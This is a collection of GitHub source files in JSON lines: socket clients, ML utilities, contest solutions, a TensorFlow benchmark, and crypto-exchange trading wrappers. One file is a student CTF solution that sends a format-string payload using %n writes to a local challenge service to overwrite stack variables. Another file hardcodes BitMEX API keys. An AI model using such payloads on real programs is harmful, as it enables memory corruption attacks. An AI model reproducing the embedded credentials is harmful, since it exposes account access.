__name__ == \"__main__\":\n\n with open(\"urls.csv\", \"r\") as f:\n\n sources = csv.reader(f)\n\n for row in sources:\n\n url, location = row\n\n image_id = fetch_image(url, location)\n send_to_qu(image_id)\n","repo_name":"kturaevv/border_guard","sub_path":"parser/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2309,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"18282769307","text":"import socket\r\nfrom random import randint\r\n\r\nClientSocket = socket.socket()\r\nhost = '127.0.0.1'\r\nport = 1233\r\n\r\ndef Convert(string):\r\n list1=[]\r\n list1[:0]=string\r\n return list1\r\n\r\nprint('Waiting for connection')\r\ntry:\r\n ClientSocket.connect((host, port))\r\nexcept socket.error as e:\r\n print(str(e))\r\n\r\nResponse = ClientSocket.recv(1024)\r\nprint(Response.decode('utf-8'))\r\n\r\nClientSocket.send(str.encode('Hello from Party 1'))\r\nResponse = ClientSocket.recv(1024)\r\nprint(Response.decode('utf-8'))\r\ndata1 = ClientSocket.recv(4096)\r\nClientSocket.send('OK'.encode())\r\ndata2 = ClientSocket.recv(4096)\r\nClientSocket.send('OK'.encode())\r\nnum1 = ClientSocket.recv(1024)\r\nClientSocket.send('OK'.encode())\r\ndata3 = ClientSocket.recv(4096)\r\n\r\nx1 = []\r\ny1 = []\r\nx2 = []\r\n\r\ndata1 = data1.decode('utf-8')\r\nfor i in range(len(data1)):\r\n if(data1[i]!= ' ' and data1[i]!= ',' and data1[i]!= '[' and data1[i]!= ']' ):\r\n x1.append(int(data1[i]))\r\nprint(x1)\r\n \r\n\r\n\r\n# Convert decoded data into list\r\n\r\ndata2 = data2.decode('utf-8')\r\nfor i in range(len(data2)):\r\n if(data2[i]!= ' ' and data2[i]!= ',' and data2[i]!= '[' and data2[i]!= ']' ):\r\n y1.append(int(data2[i]))\r\nprint(y1)\r\n\r\n\r\ndata3 = data3.decode('utf-8')\r\nfor i in range(len(data3)):\r\n if(data3[i]!= ' ' and data3[i]!= ',' and data3[i]!= '[' and data3[i]!= ']' ):\r\n x2.append(int(data3[i]))\r\nprint(x2)\r\n\r\nstrings1 = num1.decode('utf8')\r\n#get the num\r\nr = int(strings1)\r\n\r\nprint(\"x1 = \", x1, \"y1 = \", y1, \"x2 = \", x2, \"r = \",r)\r\n\r\nprint(len(x1), len(x2), len(y1))\r\na = []\r\n\r\n\r\nfor i in range(r):\r\n x = x1[i]^x2[i]\r\n a.append(x)\r\n\r\nprint(\"a = \", a)\r\n\r\nClientSocket.close()\r\n\r\n","repo_name":"anjali13s/CSP_Project","sub_path":"optimally fair implementation/client1_moran.py","file_name":"client1_moran.py","file_ext":"py","file_size_in_byte":1662,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"7082445899","text":"# -*- coding: utf-8 -*-\nfrom typing import Tuple, Union\nfrom typing import Callable\nimport pandas as pd\nimport numpy as np\nfrom src.si.data.dataset import Dataset\nfrom src.si.statisics.f_classification import f_classification\n\n\nclass SelectPercentile:\n\n def __init__(self, percentile: float = 0.25, score_func: Callable = f_classification) -> None:\n self.score_func = score_func\n self.percentile = percentile\n #parametros estimados\n self.F = None\n self.p = None\n\n def fit(self, dataset: Dataset):\n '''\n Estimates the F and p for each feature using the scoring_func\n\n :param dataset: a given dataset\n :return: self\n '''\n\n #estima o F e p para cada feature usando a scoring_func ;\n # retorna o self (ele próprio)\n\n self.F, self.p = self.score_func(dataset)\n\n return self\n\n def transform(self, dataset: Dataset) -> Dataset:\n '''\n Selects the features with the highest F value up to the indicated percentile.\n (for a dataset with 10 features and a 50% percentile, the transform should select\n the 5 features with higher F value)\n\n :param dataset: a given dataset\n :return: dataset\n '''\n\n #seleciona as features com valor de F mais alto até ao\n # percentil indicado. Por exemplo, para um dataset com 10 features e um\n # percentil de 50%, o teu transform deve selecionar as 5 features com valor\n # de F mais alto\n\n #tamanho do dataset\n length = len(dataset.features)\n #tamanho com percentile\n percentile_mask = int(length * self.percentile)\n\n #multiplicação ao longo do eixo /// retorna uma matriz de índices\n ## quanto maior o F, a diferença vai ser mais significativa por isso selecionamos o maior f\n\n # retorna por ordem crescente os index do F,\n #valores mais baixos/vai buscar ao contrario as 10 melhores com o '-'\n idxs = np.argsort(self.F)[-percentile_mask:]\n features = np.array(dataset.features)[idxs]\n\n return Dataset(X=dataset.X[:, idxs], y=dataset.y, features=list(features), label=dataset.label)\n\n def fit_transform(self, dataset: Dataset) -> Dataset:\n '''\n Runs the fit and then the transform\n\n :param dataset: a given dataset\n :return: transformed dataset\n '''\n self.fit(dataset)\n return self.transform(dataset)\n\n\nif __name__ == '__main__':\n percentile = SelectPercentile(0.50)\n dataset = Dataset(X=np.array([[0, 1, 2, 3],\n [0, 2, 4, 6],\n [1, 3, 5, 7]]),\n y=np.array([0, 1, 2]),\n features=[\"f1\", \"f2\", \"f3\", \"f4\"],\n label=\"y\")\n percentile = percentile.fit_transform(dataset)\n print(dataset.features)\n print(percentile.features)","repo_name":"carinaa9/si","sub_path":"src/si/feature_selection/select_percentile.py","file_name":"select_percentile.py","file_ext":"py","file_size_in_byte":2899,"program_lang":"python","lang":"pt","doc_type":"code","dataset":"github-code","pt":"53"}
+{"seq_id":"8798827229","text":"N = int(input())\na = list(map(int,input().split()))\nmod = 998244353\ndp = [[0]*10 for _ in range(N)]\ndp[0][a[0]] = 1\nfor i in range(1,N):\n for j in range(10):\n for k in range(10):\n if (a[i]+k)%10 == j:\n dp[i][j] += dp[i-1][k]%mod\n if (a[i]*k)%10 == j:\n dp[i][j] += dp[i-1][k]%mod\nfor i in range(10):\n print(dp[-1][i]%mod)\n# print(dp)","repo_name":"shimamura10/Atcoder","sub_path":"過去問/単発/220d.py","file_name":"220d.py","file_ext":"py","file_size_in_byte":397,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"74397836967","text":"# @Time : 2018/6/15 17:44\n# @Author : cap\n# @FileName: myGevent.py\n# @Software: PyCharm Community Edition\nimport gevent\nfrom gevent import monkey\n\nmonkey.patch_all()\nfrom socket import *\n\n\ndef handle(c):\n while True:\n data = c.recv(1024).decode()\n if not data:\n break\n else:\n print(data)\n c.send(b'i have received')\n\n\ndef server():\n s = socket()\n s.bind('0.0.0.0', 9000)\n s.listen()\n\n while True:\n c, addr = s.accept()\n print('connect from', addr)\n gevent.spawn(handle, c)\n","repo_name":"zhnin/mypython","sub_path":"modules/gevent/myGevent.py","file_name":"myGevent.py","file_ext":"py","file_size_in_byte":567,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"33516287723","text":"# (c) 2014 Amplify Education, Inc. All rights reserved, subject to the license\n# below.\n#\n# Education agencies that are members of the Smarter Balanced Assessment\n# Consortium as of August 1, 2014 are granted a worldwide, non-exclusive, fully\n# paid-up, royalty-free, perpetual license, to access, use, execute, reproduce,\n# display, distribute, perform and create derivative works of the software\n# included in the Reporting Platform, including the source code to such software.\n# This license includes the right to grant sublicenses by such consortium members\n# to third party vendors solely for the purpose of performing services on behalf\n# of such consortium member educational agencies.\n\nimport csv\nimport argparse\n\n\ndef main(csv_file):\n with open(csv_file, encoding='utf-8') as cfile:\n c_reader = csv.reader(cfile)\n for row in c_reader:\n out_str = [empty_str_to_none(val) for val in row]\n print(tuple(out_str), ',', sep='')\n\n\ndef empty_str_to_none(value):\n '''Convert any empty string to None'''\n if value == '':\n return None\n return value\n\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser('csv_to_tup')\n parser.add_argument('-c', '--csv_file', help='name of csv file', required=True)\n args = parser.parse_args()\n\n main(args.csv_file)\n","repo_name":"SmarterApp/RDW_DataWarehouse","sub_path":"edudl2/scripts/misc/csv_to_tuple_str.py","file_name":"csv_to_tuple_str.py","file_ext":"py","file_size_in_byte":1322,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"53"}
+{"seq_id":"70315462887","text":"import os\nimport sys\nimport time\nimport argparse\n\nimport numpy as np\nimport tensorflow as tf\n\n\nclass TensorFlowInfer:\n \"\"\"\n Implements TensorFlow inference of a saved model, following the same API as the TensorRTInfer class.\n \"\"\"\n\n def __init__(self, saved_model_path):\n gpus = tf.config.experimental.list_physical_devices('GPU')\n for gpu in gpus:\n tf.config.experimental.set_memory_growth(gpu, True)\n\n self.model = tf.saved_model.load(saved_model_path)\n self.pred_fn = self.model.signatures['serving_default']\n\n # Setup I/O bindings\n self.batch_size = 1\n self.inputs = []\n fn_inputs = self.pred_fn.structured_input_signature[1]\n for i, input in enumerate(list(fn_inputs.values())):\n self.inputs.append({\n 'index': i,\n 'name': input.name,\n 'dtype': np.dtype(input.dtype.as_numpy_dtype()),\n 'shape': [1, 512, 512, 3], # This can be overridden later\n })\n self.outputs = []\n fn_outputs = self.pred_fn.structured_outputs\n for i, output in enumerate(list(fn_outputs.values())):\n self.outputs.append({\n 'index': i,\n 'name': output.name,\n 'dtype': np.dtype(output.dtype.as_numpy_dtype()),\n 'shape': output.shape.as_list(),\n })\n\n def override_input_shape(self, input, shape):\n self.inputs[input]['shape'] = shape\n self.batch_size = shape[0]\n\n def input_spec(self):\n return self.inputs[0]['shape'], self.inputs[0]['dtype']\n\n def output_spec(self):\n return self.outputs[0]['shape'], self.outputs[0]['dtype']\n\n def infer(self, batch):\n # Process I/O and execute the network\n input = {self.inputs[0]['name']: tf.convert_to_tensor(batch)}\n output = self.pred_fn(**input)\n return output\n\n def process(self, batch, scales=None, nms_threshold=None):\n # Infer network\n output = self.infer(batch)\n\n # Extract the results depending on what kind of saved model this is\n boxes = None\n scores = None\n classes = None\n if len(self.outputs) == 1:\n # Detected as AutoML Saved Model\n assert len(self.outputs[0]['shape']) == 3 and self.outputs[0]['shape'][2] == 7\n results = output[self.outputs[0]['name']].numpy()\n boxes = results[:, :, 1:5]\n scores = results[:, :, 5]\n classes = results[:, :, 6].astype(np.int32)\n elif len(self.outputs) >= 4:\n # Detected as TFOD Saved Model\n assert output['num_detections']\n num = int(output['num_detections'].numpy().flatten()[0])\n boxes = output['detection_boxes'].numpy()[:, 0:num, :]\n scores = output['detection_scores'].numpy()[:, 0:num]\n classes = output['detection_classes'].numpy()[:, 0:num]\n\n # Process the results\n detections = [[]]\n normalized = (np.max(boxes) < 2.0)\n for n in range(scores.shape[1]):\n if scores[0][n] == 0.0:\n break\n scale = self.inputs[0]['shape'][2] if normalized else 1.0\n if scales:\n scale /= scales[0]\n if nms_threshold and scores[0][n] < nms_threshold:\n continue\n detections[0].append({\n 'ymin': boxes[0][n][0] * scale,\n 'xmin': boxes[0][n][1] * scale,\n 'ymax': boxes[0][n][2] * scale,\n 'xmax': boxes[0][n][3] * scale,\n 'score': scores[0][n],\n 'class': int(classes[0][n]) - 1,\n })\n return detections\n\n\ndef main(args):\n print(\"Running in benchmark mode\")\n tf_infer = TensorFlowInfer(args.saved_model)\n input_size = [int(v) for v in args.input_size.split(\",\")]\n assert len(input_size) == 2\n tf_infer.override_input_shape(0, [args.batch_size, input_size[0], input_size[1], 3])\n spec = tf_infer.input_spec()\n batch = 255 * np.random.rand(*spec[0]).astype(spec[1])\n iterations = 200\n times = []\n for i in range(20): # Warmup iterations\n tf_infer.infer(batch)\n for i in range(iterations):\n start = time.time()\n tf_infer.infer(batch)\n times.append(time.time() - start)\n print(\"Iteration {} / {}\".format(i + 1, iterations), end=\"\\r\")\n print(\"Benchmark results include TensorFlow host overhead\")\n print(\"Average Latency: {:.3f} ms\".format(\n 1000 * np.average(times)))\n print(\"Average Throughput: {:.1f} ips\".format(\n tf_infer.batch_size / np.average(times)))\n\n print()\n print(\"Finished Processing\")\n\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser()\n parser.add_argument(\"-m\", \"--saved_model\", required=True,\n help=\"The TensorFlow saved model path to validate against\")\n parser.add_argument(\"-i\", \"--input_size\", default=\"512,512\",\n help=\"The input size to run the model with, in HEIGHT,WIDTH format\")\n parser.add_argument(\"-b\", \"--batch_size\", default=1, type=int,\n help=\"The batch size to run the model with\")\n args = parser.parse_args()\n main(args)\n","repo_name":"NVIDIA/TensorRT","sub_path":"samples/python/efficientdet/infer_tf.py","file_name":"infer_tf.py","file_ext":"py","file_size_in_byte":5252,"program_lang":"python","lang":"en","doc_type":"code","stars":8187,"dataset":"github-code","pt":"53"}
+{"seq_id":"32805334112","text":"'''\n- Immanuel - 2006463162\n- Pradipta Davi Valendra - 2006462664\n- Tara Mazaya Lababan - 2006473535\n\nPenjelasan:\nPayload berupa format string yang akan mengubah nilai variabel pada stack. \nDiurutkan berdasarkan nilai variable terkecil hingga terbesar.\n'''\nfrom pwn import *\n\nBINARY = ['./chall']\nIP, PORT = 'localhost', 7777\n\np = remote(IP, PORT)\n\npayload = b'%10c%4$n' # ----> nilai variabel (d) akan diubah menjadi 10\npayload += b'%1$5c%5$n' # ----> nilai variabel (e) akan diubah menjadi 10 + 5 = 15\npayload += b'%1$15c%2$n' # ----> nilai variabel (b) akan diubah menjadi 15 + 15 = 30\npayload += b'%1$15c%1$n' # ----> nilai variabel (a) akan diubah menjadi 30 + 15 = 45\npayload += b'A%3$n' # ----> nilai variabel (c) akan diubah menjadi 45 + 1 = 46\n\np.sendline(payload)\nsleep(1)\nprint(p.recv().decode(errors='ignore'))\n","repo_name":"valordra/ctf99_tools","sub_path":"Soal kelompok/kelompok7.py","file_name":"kelompok7.py","file_ext":"py","file_size_in_byte":825,"program_lang":"python","lang":"id","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"}
+{"seq_id":"75339901608","text":"import matplotlib.pyplot as plt\nimport numpy as np\nimport matplotlib \n\n# 设置matplotlib正常显示中文和负号\nmatplotlib.rcParams['font.sans-serif']=['SimHei'] # 用黑体显示中文\nmatplotlib.rcParams['axes.unicode_minus']=False # 正常显示负号\n\ndata=np.loadtxt(\"reject_sampling.txt\")\nplt.hist(data, bins=114,density=True,facecolor=\"blue\", edgecolor=\"black\", alpha=0.7)\n# 显示横轴标签\nplt.xlabel(r\"$x$\")\n# 显示纵轴标签\nplt.ylabel(r\"probability density\")\nplt.show()","repo_name":"kaizewang/Computational_Physics_A","sub_path":"07_data_curve/plot.py","file_name":"plot.py","file_ext":"py","file_size_in_byte":497,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"53"}
+{"seq_id":"36772917392","text":"\r\n# this script will print on the terminal screen the Robot internal battery voltage\r\n# and Cozmo will speak alout the cube's battery percentage capacity remaining.\r\n# I have still to find out at what point the cube batteries fail\r\n# Bob 25th Feb 2018\r\n# This is Version 2 Change is that the internal battery voltage now only reports to 3 decimal places for brevity.\r\n# Bob 04th Mar 2018\r\n\r\n\r\nimport asyncio\r\nimport cozmo\r\nfrom cozmo.objects import LightCube1Id, LightCube2Id, LightCube3Id\r\n\r\nasync def log_cube_info(robot: cozmo.robot.Robot, cube_id):\r\n cube = robot.world.get_light_cube(cube_id)\r\n if cube is not None:\r\n # Wait for up to few seconds for the cube to have received battery level info\r\n for i in range(30):\r\n if cube.battery_voltage is None:\r\n if i == 0:\r\n cozmo.logger.info(\"Cube %s waiting for battery info...\", cube_id)\r\n await asyncio.sleep(0.5)\r\n else:\r\n break\r\n cozmo.logger.info(\"Cube %s battery = %s\", cube_id, cube.battery_str)\r\n #await robot.say_text (\"My internal Battery Voltage Currently is: %s\" % robot.battery_voltage,).wait_for_completed()\r\n await robot.say_text (\"cube %s battery = %s \" %(cube_id, cube.battery_str)).wait_for_completed()\r\n print(\"cube %s battery = %s \" %(cube_id, cube.battery_str))\r\n \r\n else:\r\n \r\n cozmo.logger.warning(\"Cube %s is not connected - check the battery.\", cube_id)\r\n \r\n\r\nasync def cozmo_program(robot: cozmo.robot.Robot):\r\n \r\n print(\"My internal Battery Voltage Currently is: %.3f\" % robot.battery_voltage)\r\n \r\n \r\n \r\n await log_cube_info(robot, LightCube1Id) # looks like a paperclip\r\n await log_cube_info(robot, LightCube2Id) # looks like a lamp / heart\r\n await log_cube_info(robot, LightCube3Id) # looks like the letters 'ab' over 'T'\r\n await robot.say_text (\"My internal Battery Voltage Currently is: %.3f Volts\" % robot.battery_voltage,).wait_for_completed()\r\n\r\ncozmo.robot.Robot.drive_off_charger_on_connect = False\r\n\r\ncozmo.run_program(cozmo_program)\r\n","repo_name":"rsmith21/cozmo","sub_path":"Cube Battery level_working.py","file_name":"Cube Battery level_working.py","file_ext":"py","file_size_in_byte":2117,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"26894002688","text":"from utils.util import (\n check_required_parameter,\n check_required_parameters,\n check_enum_parameter,\n)\n\n\n\nclass SpotWallet:\n async def system_status(self):\n \"\"\"System Status (System)\n Fetch system status.\n\n GET /sapi/v1/system/status\n\n https://binance-docs.github.io/apidocs/spot/en/#system-status-sapi-system\n \"\"\"\n\n return await self.query(\"/sapi/v1/system/status\")\n\n async def coin_info(self, **kwargs):\n \"\"\"All Coins' Information (USER_DATA)\n Get information of coins (available for deposit and withdraw) for user.\n\n GET /sapi/v1/capital/config/getall\n\n https://binance-docs.github.io/apidocs/spot/en/#all-coins-39-information-user_data\n\n Keyword Args:\n recvWindow (int, optional): The value cannot be greater than 60000\n \"\"\"\n\n return await self.sign_request(\"GET\", \"/sapi/v1/capital/config/getall\", kwargs)\n\n async def account_snapshot(self, type: str, **kwargs):\n \"\"\"Daily Account Snapshot (USER_DATA)\n\n GET /sapi/v1/accountSnapshot\n\n https://binance-docs.github.io/apidocs/spot/en/#daily-account-snapshot-user_data\n\n Parameteres:\n type -- mandatory/string -- \"SPOT\", \"MARGIN\", \"FUTURES\"\n\n Args:\n type (str): \"SPOT\", \"MARGIN\", \"FUTURES\"\n Keyword Args:\n startTime (int, optional)\n endTime (int, optional)\n limit (int, optional): min 7, max 30, async default 7\n recvWindow (int, optional): The value cannot be greater than 60000\n \"\"\"\n\n check_required_parameter(type, \"type\")\n payload = {\"type\": type, **kwargs}\n return await self.sign_request(\"GET\", \"/sapi/v1/accountSnapshot\", payload)\n\n async def account_status(self, **kwargs):\n \"\"\"Account Status (USER_DATA)\n Fetch account status detail.\n\n GET /sapi/v1/account/status\n\n https://binance-docs.github.io/apidocs/spot/en/#account-status-sapi-user_data\n\n Keyword Args:\n recvWindow (int, optional): The value cannot be greater than 60000\n \"\"\"\n\n return await self.sign_request(\"GET\", \"/sapi/v1/account/status\", kwargs)\n\n async def api_trading_status(self, **kwargs):\n \"\"\"Account API Trading Status (USER_DATA)\n Fetch account api trading status detail.\n\n GET /sapi/v1/account/apiTradingStatus\n\n https://binance-docs.github.io/apidocs/spot/en/#account-api-trading-status-sapi-user_data\n\n Keyword Args:\n recvWindow (int, optional): The value cannot be greater than 60000\n \"\"\"\n\n return await self.sign_request(\n \"GET\", \"/sapi/v1/account/apiTradingStatus\", kwargs\n )\n\n async def asset_detail(self, **kwargs):\n \"\"\"Asset Detail (USER_DATA)\n Fetch details of assets supported on Binance.\n\n GET /sapi/v1/asset/assetDetail\n\n https://binance-docs.github.io/apidocs/spot/en/#asset-detail-sapi-user_data\n\n Keyword Args:\n recvWindow (int, optional): The value cannot be greater than 60000\n \"\"\"\n\n return await self.sign_request(\"GET\", \"/sapi/v1/asset/assetDetail\", kwargs)\n\n async def trade_fee(self, **kwargs):\n \"\"\"Trade Fee (USER_DATA)\n Fetch trade fee, values in percentage.\n\n GET /sapi/v1/asset/traasync defee\n\n https://binance-docs.github.io/apidocs/spot/en/#trade-fee-sapi-user_data\n\n Keyword Args:\n symbol (str, optional)\n recvWindow (int, optional): The value cannot be greater than 60000\n \"\"\"\n\n return await self.sign_request(\"GET\", \"/sapi/v1/asset/traasync defee\", kwargs)\n\n async def funding_wallet(self, **kwargs):\n \"\"\"Funding Wallet (USER_DATA)\n\n POST /sapi/v1/asset/get-funding-asset\n\n https://binance-docs.github.io/apidocs/spot/en/#funding-wallet-user_data\n\n Keyword Args:\n asset (str, optional)\n needBtcValuation (str, optional): true or false\n recvWindow (int, optional): The value cannot be greater than 60000\n \"\"\"\n\n return await self.sign_request(\n \"POST\", \"/sapi/v1/asset/get-funding-asset\", kwargs\n )\n\n async def user_asset(self, **kwargs):\n \"\"\"User Asset (USER_DATA)\n\n Get user assets, just for positive data.\n\n Weight(IP): 5\n\n POST /sapi/v3/asset/getUserAsset\n\n https://binance-docs.github.io/apidocs/spot/en/#user-asset-user_data\n\n Keyword Args:\n asset (str, optional): If asset is blank, then query all positive assets user have.\n needBtcValuation (str, optional)\n recvWindow (int, optional): The value cannot be greater than 60000\n \"\"\"\n\n url_path = \"/sapi/v3/asset/getUserAsset\"\n return await self.sign_request(\"POST\", url_path, {**kwargs})\n\n async def api_key_permissions(self, **kwargs):\n \"\"\"Get API Key Permission (USER_DATA)\n\n GET /sapi/v1/account/apiRestrictions\n\n https://binance-docs.github.io/apidocs/spot/en/#get-api-key-permission-user_data\n\n Keyword Args:\n recvWindow (int, optional): The value cannot be greater than 60000\n \"\"\"\n\n return await self.sign_request(\n \"GET\", \"/sapi/v1/account/apiRestrictions\", kwargs\n )\n\n\n","repo_name":"majiayu000/Binance-api","sub_path":"spot/_wallet.py","file_name":"_wallet.py","file_ext":"py","file_size_in_byte":5296,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"70454829287","text":"import torch\nimport nvfuser_extension # noqa: F401\n\nt = torch.randn((5, 5), device='cuda')\nexpected = torch.sinh(t)\noutput = torch.ops.myop.sinh_nvfuser(t)\n\nprint(\"Expected:\", expected)\nprint(\"Output:\", output)\n\nassert torch.allclose(output, expected)\nprint(\"They match!\")\n","repo_name":"amd/ZenDNN-pytorch","sub_path":"third_party/nvfuser/examples/sinh_extension/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":274,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"53"}
+{"seq_id":"17015327321","text":"from maxlib import *\nfrom binancelib import *\nfrom bitmex import *\nimport pymongo\nfrom mongo_order import *\nfrom pymongo import MongoClient\nimport urllib \nimport logging\nfrom Websocket.util.api_key import generate_nonce, generate_signature\nfrom Websocket import bitmex_websocket\nimport logging\nfrom time import sleep\nimport threading\nbitmex_api_key = 'CjyHN90eGN8Iby8Cnl6kaSJZ'\nbitmex_api_secret = 'GGcRPuh_BJvwXJmxFar9fFE5BcfzGBvxBzwyunmQMBkWKzl6'\nclass Interface():\n\tdef __init__(self):\n\t\tself.Max = MaxLib(\"\",\n\t\t\t\t\"\")\n\t\t#self.Max = MaxLib(\"\",\n\t\t#\t\t\"\")\n\t\t#self.Max = MaxLib(\"\",\n\t\t#\t\t\"\")\n\t\tself.bitmex = Bitmex('CjyHN90eGN8Iby8Cnl6kaSJZ','GGcRPuh_BJvwXJmxFar9fFE5BcfzGBvxBzwyunmQMBkWKzl6')\n\t\tself.Bin = BinanceLib(\"\",\n\t\t\t\t\"\")\n\t\tself.mongo = MongoOrder('trade','place_order')\n\tdef Order_info(self, exchange, market):\n\t\tif(exchange == \"bin\"):\n\t\t\treturn self.Bin.Order_process(market)\n\t\telif(exchange == \"max\"):\n\t\t\treturn self.Max.Order_process(market)\n\tdef Post_orders(self, exchange, market, side, volume, price, types,userID):\n\t\tneworder = {'userID':userID,'exchange':exchange,'market':market,'orderside':side,'ordertype':types,'price':price,'volume':volume,'statue':0}\n\t\tif(exchange == \"bin\"):\n\t\t\torder = self.Bin.Post_orders(market, side, str(volume), str(price), types)\n\t\telif(exchange == \"max\"):\t\t\n\t\t\torder = self.Max.Post_orders(market, side, volume, price, types)\n\t\telif(exchange == 'bitmex'):\n\t\t\torder = self.bitmex.Post_orders(market ,side,float(volume), price, types)\n\t\tneworder['orderID'] = order['orderID']\n\t\tself.mongo.AddOrder(neworder)\n\tdef ClearAll(self, exchange, market):#???\n\t\tif(exchange == \"bin\"):\n\t\t\treturn self.Bin.Clear_all(market)\n\t\telif(exchange == \"max\"):\n\t\t\treturn self.Max.Orders_clear(market)\n\t\telif(exchange == \"bitmex\"):\n\t\t\treturn self.bitmex.DeleteAllOrder(market)\n\tdef DeleteOrdersByOid(self, exchange, market, idnumber):\n\t\tresult = []\n\t\tif(exchange == \"bin\"):\n\t\t\tfor i in idnumber:\n\t\t\t\tresult.append(self.Bin.Delete_orders(market,i[\"id\"]))\n\t\telif(exchange == \"max\"):\n\t\t\tfor i in idnumber:\n\t\t\t\tresult.append(self.Max.Delete_orders(i[\"id\"]))\n\t\telif(exchange == 'bitmex'):\n\t\t\tmyquery = []\n\t\t\tfor id in idnumber:\n\t\t\t\tresult.append(self.bitmex.DeleteOrder(id))\n\t\t\t\tmyquery.append(id)\n\t\tprint (myquery)\n\t\tfor id in myquery:\n\t\t\tself.mongo.DeleteByOid(id)\n\t\treturn result\n\tdef GetOrders(self, exchange, market):\n\t\tif(exchange == \"bin\"):\n\t\t\treturn self.Bin.Get_orders(market)\n\t\telif(exchange == \"max\"):\n\t\t\treturn self.Max.Trades_my(market, \"100\")\n\t\telif(exchange == \"bitmex\"):\n\t\t\treturn self.bitmex.GetOrder(market)\n\tdef GetOrder(self, exchange, ids):\n\t\tif(exchange == \"max\"):\n\t\t\treturn self.Max.Get_order(ids)\n\t\telif(exchange == \"bitmex\"):\n\t\t\tresult = []\n\t\t\torders = self.bitmex.GetOrder()[0]\n\t\t\tfor order in orders:\n\t\t\t\tif(order['orderid'] in ids):\n\t\t\t\t\tresult.append(order)\n\t\t\treturn result\n\tdef Account(self, exchange):\n\t\tif(exchange == \"bin\"):\n\t\t\treturn self.Bin.Account()\n\t\tif(exchange == \"max\"):\n\t\t\treturn self.Max.Account()\nclass MyThread(threading.Thread):\n\tdef __init__(self,key,secret,symbol,userID):\n\t\tthreading.Thread.__init__(self)\t\t\n\t\tself.ws = bitmex_websocket.BitMEXWebsocket(endpoint=\"https://testnet.bitmex.com/api/v1\", symbol = symbol,api_key = key, api_secret = secret)\n\t\tself.interface = Interface()\t\n\t\tself.symbol = symbol\n\t\tself.userid = userID\n\t\tself.mongo = MongoOrder('trade','place_order')\n\tdef run(self):\n\t\twhile(self.ws.ws.sock.connected):\n\t\t\tinfors = self.ws.GetOrder()\n\t\t\tself.ChangeOrderStatus(infors)\n\t\t\tsleep(10)\t\t\n\tdef ChangeOrderStatus(self, infors):\n\t\torders = self.interface.GetOrders('bitmex',self.symbol)[0]\n\t\tids = []\n\t\tfor infor in infors:\n\t\t\tids.append(infor['orderID'])\n\t\tfor order in orders:\n\t\t\tprint ('!')\n\t\t\tprint (order)\n\t\t\tif(order['orderid'] not in ids):\n\t\t\t\tself.mongo.UpdateStatusById(order['orderid'])\ntest = MyThread(bitmex_api_key,bitmex_api_secret,'XBTUSD','1')\ntest.start()\ninte = Interface()\n#inte.ClearAll('bitmex','2')\n#inte.GetOrderStatus('XBTUSD','1')\n#exchange, market, side, volume, price, types, marketnameindex = None\ninte.Post_orders('bitmex','XBTUSD','Buy',5,4002,'limit','1')\n#inte.Post_orders('bitmex','XBTUSD','Buy',5,234,'limit')\n#inte.Post_orders('bitmex','ETHUSD','Buy',5,155,'limit')\n#exchange, market, idnumber\n#print (inte.Get_orders('bitmex',''))\n#inte.DeleteOrdersByOid('bitmex','ETHUSD',['29b030cd-d57d-068f-f2c0-357d2f9a6b7b'])\n\n#inte.Clear_all('bitmex','')\n","repo_name":"jmike1211/py-cryptoTrade","sub_path":"interface.py","file_name":"interface.py","file_ext":"py","file_size_in_byte":4366,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"6575391551","text":"\nn, m = map(int, input().split())\na = []\nmx = 0\nmn = 1000000\nfor i in range(n):\n x = list(map(int, input().split()))\n tmpmax = max(x)\n mx = max(tmpmax, mx)\n tmpmin = min(x)\n mn = min(tmpmin, mn)\n a.append(x)\nflat = True\n\ntmp = mx-mn\n\nfor i in range(n):\n for j in range(m):\n if(tmp == a[i][j]):\n flat = False\n break\n if(flat == False):\n break\nif(flat):\n print('NOT FOUND')\nelse:\n print(tmp)\n for i in range(n):\n for j in range(m):\n if(tmp == a[i][j]):\n print(\"Vi tri [\" + str(i) + \"][\" + str(j) + \"]\")\n \n ","repo_name":"bakachanbaby/code_ptit","sub_path":"so_may_man_trong_ma_tran.py","file_name":"so_may_man_trong_ma_tran.py","file_ext":"py","file_size_in_byte":628,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"}
